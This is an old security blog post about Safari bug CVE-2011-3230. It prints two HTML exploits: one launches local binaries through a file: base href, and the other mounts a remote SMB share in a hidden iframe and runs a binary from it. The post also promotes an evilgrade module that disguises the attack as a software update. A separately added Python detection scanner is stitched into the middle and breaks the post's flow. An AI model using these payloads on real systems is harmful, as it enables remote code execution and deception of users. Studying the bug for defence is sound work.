Tuesday, 18 October 2011

Safari 5.1.1 Old School Remote Execution PoC (CVE-2011-3230)


On October 12, Aaron Sigel published an interesting bug (CVE-2011-3230) affecting Safari versions prior to 5.1.1 (Mac OS X only).

Aaron noticed that “It allows you to send any 'file:' url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

The following PoC demonstrates the vulnerability:

<html>
<head>
<base href="file://">
<script>
 function DoIt() {
  alert(document.getElementById("cmdToRun").value);
  document.location=document.getElementById("cmdToRun").value;
 }
</script>
</head>
<body>
<select id="cmdToRun">
 <option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>
 <option value="/etc/passwd">Launch /etc/passwd</option>
 <option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>

As the PoC above shows, you cannot pass arguments to the launched binary, and you need to know the exact path of the file you want to run.

Additionally, LaunchServices checks the quarantine attribute ("quarantine bit"), so it cannot directly execute a binary downloaded from the Internet.

With a small modification to the exploit, we can execute a binary under our own control:

<html>
<head>
<base href="file://">
</head>
<body>
    <iframe src="smb://Administrador:X@x.x.x.x/C$"
      width="0" height="0" scrolling="auto"   frameborder="1" transparency>
    </iframe>
<script>
function sleep(milliSeconds){
        var startTime = new Date().getTime(); // get the current time
        while (new Date().getTime() < startTime + milliSeconds); // hog cpu
}
sleep(8000);
document.location="/Volumes/C$/infobyte/ls";
</script>
</body>
</html>

In this example:
1) We mount an SMB share, so the mount point is predictable: /Volumes/[NAMESHARE]
2) Then we sleep for a while until the share is mounted.
3) Finally we run the binary, in this case a simple "ls".

Other protocols, such as FTP or AFP, can also be used for this attack.
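From the defender's side, the pattern described above is easy to recognise in a captured page: a `<base href="file://">`, an iframe whose `src` uses a mountable scheme (smb, afp, ftp), and a script that navigates to an absolute local path such as `/Volumes/...`. The following Python example is added here and is not code from the original post; it is a heuristic scanner for web-proxy or sandbox captures, plus a User-Agent check that flags Mac OS X Safari clients older than 5.1.1 (the fixed version). The two HTML samples and the User-Agent strings are constructed for the example, and the regular expressions are a heuristic, not a complete parser.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: a minimal page carrying the three indicators discussed above.
SAMPLE_PAGE = """<html><head><base href="file://"></head><body>
<iframe src="smb://user:pass@192.0.2.10/C$" width="0" height="0"></iframe>
<script>
document.location="/Volumes/C$/tools/ls";
</script></body></html>"""

# Constructed benign page: an ordinary same-site redirect, no file: base.
BENIGN_PAGE = """<html><head><base href="https://example.test/"></head>
<body><script>document.location="/index.html";</script></body></html>"""

# <base href="file:..."> makes relative navigations resolve against the local filesystem.
BASE_FILE_RE = re.compile(r'<base\s+[^>]*href\s*=\s*["\']?file:', re.I)
# Iframes using schemes that Mac OS X auto-mounts under /Volumes/.
MOUNT_IFRAME_RE = re.compile(r'<iframe\s+[^>]*src\s*=\s*["\']?(smb|afp|ftp)://', re.I)
# Script-driven navigation to a quoted literal target.
NAV_RE = re.compile(
    r'(?:document|window)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
# Absolute paths that only make sense as local filesystem locations.
ABS_PATH_RE = re.compile(r'^(?:/Volumes/|/usr/|/bin/|/sbin/|/etc/|/Applications/)')


def scan_html(html: str) -> Dict[str, object]:
    """Return heuristic findings for one HTML document and an overall verdict."""
    findings: List[str] = []
    if BASE_FILE_RE.search(html):
        findings.append("base-href-file")
    for m in MOUNT_IFRAME_RE.finditer(html):
        findings.append("mount-iframe:" + m.group(1).lower())
    for m in NAV_RE.finditer(html):
        target = m.group(1)
        if target.lower().startswith("file:") or ABS_PATH_RE.match(target):
            findings.append("local-path-navigation:" + target)

    # Verdict: the file: base combined with a local-path navigation is the
    # LaunchServices pattern itself; any single indicator alone only merits review.
    has_base = "base-href-file" in findings
    has_nav = any(f.startswith("local-path-navigation:") for f in findings)
    if has_base and has_nav:
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


SAFARI_VERSION_RE = re.compile(r'Version/(\d+)(?:\.(\d+))?(?:\.(\d+))?[^"]*Safari/')
FIXED_VERSION: Tuple[int, int, int] = (5, 1, 1)  # Safari 5.1.1 ships the fix (HT5000)


def safari_version(user_agent: str) -> Optional[Tuple[int, int, int]]:
    """Extract the Safari marketing version (Version/x.y.z) from a User-Agent, if present."""
    m = SAFARI_VERSION_RE.search(user_agent)
    if not m:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())  # type: ignore[return-value]


def safari_client_vulnerable(user_agent: str) -> bool:
    """True for Mac OS X Safari clients older than 5.1.1; the bug is Mac OS X only."""
    if "Macintosh" not in user_agent:
        return False
    version = safari_version(user_agent)
    return version is not None and version < FIXED_VERSION


if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page))
    ua_old = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.22 "
              "(KHTML, like Gecko) Version/5.1 Safari/534.51.22")
    print("old client vulnerable:", safari_client_vulnerable(ua_old))
```

The scanner is meant for triage of captured pages rather than for blocking: a `file:` base alone appears in some legitimate local HTML, so only the combination with a local-path navigation is rated "suspicious". The User-Agent check is useful over proxy logs to find clients that still need the Safari 5.1.1 update.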

The problem is that an alert pops up asking the user to confirm execution of the binary.

We have just added the module safari.pm to evilgrade to take advantage of this vulnerability by making users believe it is an update.

Download the latest version: https://code.google.com/p/isr-evilgrade/source/list

The interesting part is that there are file types unknown to Mac OS X, and LaunchServices opens these without any user interaction.


The following PoC uses the FTP service and then opens a PDF:
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Imagine, for example, combining this vulnerability with a dangerous file type.
Congratulations to Aaron Sigel (@diretraversal) for the research on this 'old school' vulnerability.

Reference:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000
